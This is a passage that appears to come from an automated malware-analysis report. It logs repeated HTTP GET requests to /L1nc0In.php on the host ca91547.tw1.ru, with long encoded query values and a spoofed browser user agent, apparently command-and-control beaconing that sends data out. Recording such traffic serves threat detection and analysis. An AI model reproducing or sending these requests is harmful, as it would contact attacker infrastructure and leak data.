maGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWY